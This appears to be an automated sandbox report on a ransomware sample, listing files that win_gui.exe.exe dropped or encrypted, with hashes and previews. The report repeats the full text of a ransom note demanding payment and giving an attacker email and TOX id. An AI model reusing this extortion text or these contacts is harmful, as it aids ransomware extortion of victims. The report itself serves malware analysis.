                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\Public\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\.ms-ad\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\3D Objects\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\AppData\Local\Temp\default.tmp

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):576
                                Entropy (8bit):7.470774830722899
                                Encrypted:false
                                SSDEEP:12:/sYCWw14eNR1PcrSOGJ9fuyAWKj0hOJNuauDZMK5mg/2lWOZOs9p:/z/wpDyYPGTNj0hOHAVMJg6WXs9p
                                MD5:75DBE1EA85A5B9E2CE02702E4C04A047
                                SHA1:F7DB99F6E1076B71A6F5ADBCA2A4B066161D8D0B
                                SHA-256:DEF0CA6FECE56C6B184C1C97E15E78D6E7C11446D7583986EE490D40CF7711B4
                                SHA-512:B6B600A74FCA5592B1BDB0368BE116FFE2443FB93B2961AC3FA45C9B90E3EAC6B2C4BCBDBD1DCC94AFBB8B0CD5D29CC290052026BA33AC22A59AFC1E7FF52D46
                                Malicious:false
                                Preview:...................................}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N

                                C:\Users\user\Contacts\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\Desktop\BJZFPPWAPT.docx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.882742702467496
                                Encrypted:false
                                SSDEEP:48:LaNixTnN201Sp0dH1GXqnRI/WyYu+MAVMJg6TC:meN20A+rGXSRIevuAVOC
                                MD5:54D778A5396A1063CB4A5FB9A4194275
                                SHA1:5E843ECE4D18C7D3F8A584F93A0A2DA926BC131C
                                SHA-256:B245928E765DD8D03DE6CED8C7AE16F3C653DF576B4D7E553E35873E1FAB36C4
                                SHA-512:AA8B0C9CC6BA6E75D0284A174D8111BF722B1EB4CC8733A15DFD3B4539D3A2B5C716E6843BD10638A377591231A4D2BBC0AE4E268BBC6B59D91D72BCE61CB937
                                Malicious:false
                                Preview::.;....--.wP......v.{{G.....-'=Z..vE..B..7.f3.g?4..}:..I.xL;...*./Tb'k.\...8n..Um..0|...<8.W.3p`....!._...Y.A...l$.F.......*...qCB.c.."G..a..%......,w.Xjm.t....k5..O.8..?....zvot..tI~$i.._...e(.4....!H.....e.@.?.q.v..... .o9..YQ<,....<.C\#.<....+}2......K-U..H.7GP.Nh.A"..'c"...p....X...].........I......z.'4.8a.k.Zo....%P&.C`..w..M....p.\X_X+.b2Ex/....._...l...&......m..P,A*....`....!.v...d.n..}j..qo...m.X..I..L2.....k.C......y2.........+..NZ1.$..,.5.l.......F....B%....0.j5.{8.#...qL..!/la.*.Kf)..[..g:l..% _....(..2T..........lx0.t.......u|....j..P...dF.Z.$D.kV..W.t.s..H..<1......N.c.N/.4.Cl.7.....,+..\{...?..y.a...*..M.......@...:.2.u..g!..D#..L...z+......Uj...Kf...q.m....L>.o.r......q..3.~..e.7....n.......dke=......m[.E..H.......*....r...#..a_9..E.Or...E3......s...h./.-y.j.. .lQD.\Z....L./"=H%.......Z..-?Bb.F,.I.N?..c....{..)\.Ts..).(...~..o.Ok.j.....c#.....`f......q.zC)7...w...B.RC|I.,`(.w.&t.C*@]....L....v.K.+..@u|..Ca.....L.%$.

                                C:\Users\user\Desktop\BJZFPPWAPT.docx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.882742702467496
                                Encrypted:false
                                SSDEEP:48:LaNixTnN201Sp0dH1GXqnRI/WyYu+MAVMJg6TC:meN20A+rGXSRIevuAVOC
                                MD5:54D778A5396A1063CB4A5FB9A4194275
                                SHA1:5E843ECE4D18C7D3F8A584F93A0A2DA926BC131C
                                SHA-256:B245928E765DD8D03DE6CED8C7AE16F3C653DF576B4D7E553E35873E1FAB36C4
                                SHA-512:AA8B0C9CC6BA6E75D0284A174D8111BF722B1EB4CC8733A15DFD3B4539D3A2B5C716E6843BD10638A377591231A4D2BBC0AE4E268BBC6B59D91D72BCE61CB937
                                Malicious:false
                                Preview::.;....--.wP......v.{{G.....-'=Z..vE..B..7.f3.g?4..}:..I.xL;...*./Tb'k.\...8n..Um..0|...<8.W.3p`....!._...Y.A...l$.F.......*...qCB.c.."G..a..%......,w.Xjm.t....k5..O.8..?....zvot..tI~$i.._...e(.4....!H.....e.@.?.q.v..... .o9..YQ<,....<.C\#.<....+}2......K-U..H.7GP.Nh.A"..'c"...p....X...].........I......z.'4.8a.k.Zo....%P&.C`..w..M....p.\X_X+.b2Ex/....._...l...&......m..P,A*....`....!.v...d.n..}j..qo...m.X..I..L2.....k.C......y2.........+..NZ1.$..,.5.l.......F....B%....0.j5.{8.#...qL..!/la.*.Kf)..[..g:l..% _....(..2T..........lx0.t.......u|....j..P...dF.Z.$D.kV..W.t.s..H..<1......N.c.N/.4.Cl.7.....,+..\{...?..y.a...*..M.......@...:.2.u..g!..D#..L...z+......Uj...Kf...q.m....L>.o.r......q..3.~..e.7....n.......dke=......m[.E..H.......*....r...#..a_9..E.Or...E3......s...h./.-y.j.. .lQD.\Z....L./"=H%.......Z..-?Bb.F,.I.N?..c....{..)\.Ts..).(...~..o.Ok.j.....c#.....`f......q.zC)7...w...B.RC|I.,`(.w.&t.C*@]....L....v.K.+..@u|..Ca.....L.%$.

                                C:\Users\user\Desktop\BJZFPPWAPT.jpg

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.866580644871835
                                Encrypted:false
                                SSDEEP:48:/pOmH7fp+gSGg5T3/g/WyYu+MAVMJg6TdC:/phHDp+BGyT3/gevuAVOdC
                                MD5:65B06AE2C850315249800BF64DD00670
                                SHA1:D3FACEF2A8DD19CB53EF5D87F48AC74036CC3386
                                SHA-256:002CEAB60C9374A9968C83981B9BFB8AF186DB07EDC8EE5C74915367B9E11272
                                SHA-512:31FEEBCF4504F9AF24CE95C9C75E85F8F942C8CB9D889E6A0B86A0F3C41C92890201552DBAF1CD2CF0E1453ECE078E6DC6861BFDA1CA98B8D4B20CE3F5F46889
                                Malicious:false
                                Preview:..[e..t.:..U..L..t.v.\ew.E..Ux:VF.....@.;U...CM.......@._#K........-|..i_B,..iz..xD...5.k|7.mC...H6nq\.k.%8.9.b...(..x.6....]>.....n.X;_n...../....0H..4.r.Z..D9....x.....iv..Yc\.9........pk...1....j9z.....2...k5/..=..?dp.Fv2.K...Da.G.8@)......i.O.i...n...s0..3......3...k.Mi.........EN.o9..I.2.9:.t....."k...]...,|.k.....0l..z. .9<..:<R....<...H..H..eoONFj<P...jW.i6p./&.9..p}....).hJ./.....T.1o...T.'..,...?.E..XHs..|.)... ...W..f.*.?V=.d.....,.7..^.`..cv..M.B;.l.....L..}..0.Q..}.I.Z...T..&....@b.n......q..d.B!........G.t.t........ .c. A..E..........=....^6MI#)....NSI.y...5.f`.E...e......Y..n!.5UF.[.....c......T..c.."ZgT'8.:.....95=.y.l.9...W&..p...!!......He@........{..*.!.3B.....OP..<B'.C6...U....j......X(.f1.n..F'r.W.g...s..<*.&.KM.C.1.K..H.4....%r.|mg..M..).;.....;ZW.w.?k.{9c..U.....a.....}....0...Iw..^m.|.vJ.rn+..\.../.G...3[.1..&....".O......T.._.+.24..W.6.j.y.......Dy.,93.!P.t)a...>.A.<.......i...s.Y.E.%.....n._.t......U.R/7.PP.mcq

                                C:\Users\user\Desktop\BJZFPPWAPT.jpg.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.866580644871835
                                Encrypted:false
                                SSDEEP:48:/pOmH7fp+gSGg5T3/g/WyYu+MAVMJg6TdC:/phHDp+BGyT3/gevuAVOdC
                                MD5:65B06AE2C850315249800BF64DD00670
                                SHA1:D3FACEF2A8DD19CB53EF5D87F48AC74036CC3386
                                SHA-256:002CEAB60C9374A9968C83981B9BFB8AF186DB07EDC8EE5C74915367B9E11272
                                SHA-512:31FEEBCF4504F9AF24CE95C9C75E85F8F942C8CB9D889E6A0B86A0F3C41C92890201552DBAF1CD2CF0E1453ECE078E6DC6861BFDA1CA98B8D4B20CE3F5F46889
                                Malicious:false
                                Preview:..[e..t.:..U..L..t.v.\ew.E..Ux:VF.....@.;U...CM.......@._#K........-|..i_B,..iz..xD...5.k|7.mC...H6nq\.k.%8.9.b...(..x.6....]>.....n.X;_n...../....0H..4.r.Z..D9....x.....iv..Yc\.9........pk...1....j9z.....2...k5/..=..?dp.Fv2.K...Da.G.8@)......i.O.i...n...s0..3......3...k.Mi.........EN.o9..I.2.9:.t....."k...]...,|.k.....0l..z. .9<..:<R....<...H..H..eoONFj<P...jW.i6p./&.9..p}....).hJ./.....T.1o...T.'..,...?.E..XHs..|.)... ...W..f.*.?V=.d.....,.7..^.`..cv..M.B;.l.....L..}..0.Q..}.I.Z...T..&....@b.n......q..d.B!........G.t.t........ .c. A..E..........=....^6MI#)....NSI.y...5.f`.E...e......Y..n!.5UF.[.....c......T..c.."ZgT'8.:.....95=.y.l.9...W&..p...!!......He@........{..*.!.3B.....OP..<B'.C6...U....j......X(.f1.n..F'r.W.g...s..<*.&.KM.C.1.K..H.4....%r.|mg..M..).;.....;ZW.w.?k.{9c..U.....a.....}....0...Iw..^m.|.vJ.rn+..\.../.G...3[.1..&....".O......T.._.+.24..W.6.j.y.......Dy.,93.!P.t)a...>.A.<.......i...s.Y.E.%.....n._.t......U.R/7.PP.mcq

                                C:\Users\user\Desktop\BJZFPPWAPT.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.852259477161106
                                Encrypted:false
                                SSDEEP:48:pJJJLDKqjkD0OhASvQkohzsFBNeQ/WyYu+MAVMJg6Tm:pJzuqg0LLKDevuAVOm
                                MD5:DCEC546C6F67DD35375070C63CCFC1AB
                                SHA1:148D03D5209927463907AB9C6B4E26254A9D6EB5
                                SHA-256:A225D86679883D09F5551B92B6B3ACBA53EFD59C830879D8311C43FEA32B00FD
                                SHA-512:6A0FF1B3C2B5EA74D2F5C05CAC45D497A52A66ED8AD313D312F734A151F9891B8D52553FA6F8474E457EAA4633D237DDB667D8746418455272158CF722E2AD16
                                Malicious:false
                                Preview:.9...\....../.?.2+.='W.1!Ih`W.,../@..&...HN w.I..]..M9t.....[NPUUov....!.Q...^$...R7...w.H..QZ.E.fU..v....!...B7.PA...MM....U.9...O...]..L.r..}...wi$...)...e.~...........%..[....2.....go.r...1. j.CSU...Y1@..E.....z....@...`.O8...;}v....T......o.......}D...?<t....2..uokF.....q_.X.=yz".M.L..$}L..Ff.Y.Z.d..ty...[o.ac0Z...v.,...AvC.o...b.oQ....w.W*."S..I.F.C_..\......^(\.z.9.jN....\@.....O...i}...b...k_..7.....%..Z.B.pX%.-.....VfS8!.A....@.?j5I!K ...'>.)U.Q.=.Y.w....]...[.?.h=.cL+B..EA.j..?.I..~i..P.0,.Z....T..2n............g.Y.Y.AD0..O.`L.!J=.xW..d8........`.e.o)H..b...B..[.a..@...U..I.....}..<.h...e..t......jH.i..;.....u..G.T...3.|.......K../.P..?.bg.z.OE.H......"O..R..@...trRB.......7.\?.b......l....|C.q.k.2..M...Na.......e....}b1.n>HX...f6.{.....|q....g......%3[...q.+gJ&...Z8...X..a.......[.).....=...p..'........e.'.......b....t.."...`\"..G....Y....$...(&.....f2....g\..tBbIUxG.f".0..dZR..].wmt0...S=....+/..._.x...q...{.......g8.Co..

                                C:\Users\user\Desktop\BJZFPPWAPT.xlsx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.852259477161106
                                Encrypted:false
                                SSDEEP:48:pJJJLDKqjkD0OhASvQkohzsFBNeQ/WyYu+MAVMJg6Tm:pJzuqg0LLKDevuAVOm
                                MD5:DCEC546C6F67DD35375070C63CCFC1AB
                                SHA1:148D03D5209927463907AB9C6B4E26254A9D6EB5
                                SHA-256:A225D86679883D09F5551B92B6B3ACBA53EFD59C830879D8311C43FEA32B00FD
                                SHA-512:6A0FF1B3C2B5EA74D2F5C05CAC45D497A52A66ED8AD313D312F734A151F9891B8D52553FA6F8474E457EAA4633D237DDB667D8746418455272158CF722E2AD16
                                Malicious:false
                                Preview:.9...\....../.?.2+.='W.1!Ih`W.,../@..&...HN w.I..]..M9t.....[NPUUov....!.Q...^$...R7...w.H..QZ.E.fU..v....!...B7.PA...MM....U.9...O...]..L.r..}...wi$...)...e.~...........%..[....2.....go.r...1. j.CSU...Y1@..E.....z....@...`.O8...;}v....T......o.......}D...?<t....2..uokF.....q_.X.=yz".M.L..$}L..Ff.Y.Z.d..ty...[o.ac0Z...v.,...AvC.o...b.oQ....w.W*."S..I.F.C_..\......^(\.z.9.jN....\@.....O...i}...b...k_..7.....%..Z.B.pX%.-.....VfS8!.A....@.?j5I!K ...'>.)U.Q.=.Y.w....]...[.?.h=.cL+B..EA.j..?.I..~i..P.0,.Z....T..2n............g.Y.Y.AD0..O.`L.!J=.xW..d8........`.e.o)H..b...B..[.a..@...U..I.....}..<.h...e..t......jH.i..;.....u..G.T...3.|.......K../.P..?.bg.z.OE.H......"O..R..@...trRB.......7.\?.b......l....|C.q.k.2..M...Na.......e....}b1.n>HX...f6.{.....|q....g......%3[...q.+gJ&...Z8...X..a.......[.).....=...p..'........e.'.......b....t.."...`\"..G....Y....$...(&.....f2....g\..tBbIUxG.f".0..dZR..].wmt0...S=....+/..._.x...q...{.......g8.Co..

                                C:\Users\user\Desktop\DUUDTUBZFW.mp3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.855462544588671
                                Encrypted:false
                                SSDEEP:48:FVFQlXzQ3b/WGNJZu5c7z/WyYu+MAVMJg6TD6L2:KDQ3jdNXuC7zevuAVODV
                                MD5:6FC9CF5122E43033CA6911FEEC602027
                                SHA1:EDA42F4E1FB1F5CC9D87F61D3AE9C1E5941844EF
                                SHA-256:E08CC73D3CB7E7B5F4C6F70E897B3AD290AD927AA1BFE0A9AC03FEFF2FDA37B2
                                SHA-512:BE72786A087187DD286DC7F3968D0343FB8DC4559020A4729B35D505E78C662BEA81583AF24052F4973871FBDEB59E3F8F9C4FFA90DAFF88F94AAE0D89504906
                                Malicious:false
                                Preview:G.....H..]W.H.n..e...j.D;aj.G..^....G.i..wO@.w..{!C.^...?u...L...l@&..dol.D...^T.2r.x...<\..4.....w=....._.(..-...ct....`..W....EvN....G....2{-..\y...>.-La...XG.(Sl..5.;.lqz:n."..l3..R...dg....[...#2<..:iCE..eP.I.B.........lj.e46.U.(..`.C.?4.p.S..=....4.AA.N0A.E.:..F.A...Y.........).l.........J.J.z.Wk).......9.np...!!s....Gt.]p.F5._...._I.'.6w..i.........o...04t.p.........._.-^..Kb...ig[`.^.n!..c...}....C...L...r|Q......6....5.pD*A._gFn.I.".Wr{P.y..;......W.*.{VS.^..+.J....l&Bt.U8.P.k..7pb:f.;+. .._-...X..05hh..@..D.._.....E.O..6.y.s...L.....\...^.|..2.)r&.%.......G~N....1a...T..MOG^)~Oy.U..5.<e....l..C.L..F..Y....<.d~..%.....T>.v(,.$.(.\....Q...-).......z.U....V...kG...j.pX...1.t..X)...aEM..al.5=A..Z.()+...........QX;F...^9v.:U4..v.}L=....=u......>..b....z.F&.`..(..q....+_..:.!.>.l@{.6=......[!...........F..%....E.(?...F)z..$.3.......-u.X.....0...5.Lq.Y...~.]..>`RW.y...[;....H...Q.j....Db.s..zp[.(.&..&{.].w..m-9......~f6.M........Aq..k.I7D.

                                C:\Users\user\Desktop\DUUDTUBZFW.mp3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.855462544588671
                                Encrypted:false
                                SSDEEP:48:FVFQlXzQ3b/WGNJZu5c7z/WyYu+MAVMJg6TD6L2:KDQ3jdNXuC7zevuAVODV
                                MD5:6FC9CF5122E43033CA6911FEEC602027
                                SHA1:EDA42F4E1FB1F5CC9D87F61D3AE9C1E5941844EF
                                SHA-256:E08CC73D3CB7E7B5F4C6F70E897B3AD290AD927AA1BFE0A9AC03FEFF2FDA37B2
                                SHA-512:BE72786A087187DD286DC7F3968D0343FB8DC4559020A4729B35D505E78C662BEA81583AF24052F4973871FBDEB59E3F8F9C4FFA90DAFF88F94AAE0D89504906
                                Malicious:false
                                Preview:G.....H..]W.H.n..e...j.D;aj.G..^....G.i..wO@.w..{!C.^...?u...L...l@&..dol.D...^T.2r.x...<\..4.....w=....._.(..-...ct....`..W....EvN....G....2{-..\y...>.-La...XG.(Sl..5.;.lqz:n."..l3..R...dg....[...#2<..:iCE..eP.I.B.........lj.e46.U.(..`.C.?4.p.S..=....4.AA.N0A.E.:..F.A...Y.........).l.........J.J.z.Wk).......9.np...!!s....Gt.]p.F5._...._I.'.6w..i.........o...04t.p.........._.-^..Kb...ig[`.^.n!..c...}....C...L...r|Q......6....5.pD*A._gFn.I.".Wr{P.y..;......W.*.{VS.^..+.J....l&Bt.U8.P.k..7pb:f.;+. .._-...X..05hh..@..D.._.....E.O..6.y.s...L.....\...^.|..2.)r&.%.......G~N....1a...T..MOG^)~Oy.U..5.<e....l..C.L..F..Y....<.d~..%.....T>.v(,.$.(.\....Q...-).......z.U....V...kG...j.pX...1.t..X)...aEM..al.5=A..Z.()+...........QX;F...^9v.:U4..v.}L=....=u......>..b....z.F&.`..(..q....+_..:.!.>.l@{.6=......[!...........F..%....E.(?...F)z..$.3.......-u.X.....0...5.Lq.Y...~.]..>`RW.y...[;....H...Q.j....Db.s..zp[.(.&..&{.].w..m-9......~f6.M........Aq..k.I7D.

                                C:\Users\user\Desktop\DUUDTUBZFW.pdf

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.878010680561289
                                Encrypted:false
                                SSDEEP:48:8+hUM22e5PKDqOF4lviahJysvDZ/WyYu+MAVMJg6TO:8+ha2nqRlXhJbv9evuAVOO
                                MD5:D9A6088E5B1536691AAC7A0D51FD47DB
                                SHA1:4B3B5F1357A4D0378D625C530333C794E7912ED3
                                SHA-256:99D1E487CD6BEB45E3AFA254655603ECF16CABF122D0A1ADE8A03A202ECA5C1B
                                SHA-512:96B1481A7F2E62341D28AF5D316D62854288CBA8DADEADB2EE9BBB8A6AAD7A10E8EF2878F0E922E5DF5691E035E81EC41DAF4D1521E576AF196CFF23628300A8
                                Malicious:false
